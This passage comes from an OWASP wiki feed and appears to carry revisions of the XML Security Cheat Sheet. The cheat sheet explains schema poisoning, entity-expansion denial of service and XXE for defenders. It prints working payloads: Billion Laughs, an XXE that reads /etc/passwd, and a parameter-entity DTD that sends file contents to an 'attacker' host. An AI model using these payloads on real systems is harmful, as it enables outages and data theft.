     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''%xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 foo://username:password@example.com:8080/&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224441</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224441"/>
				<updated>2016-12-21T20:29:44Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
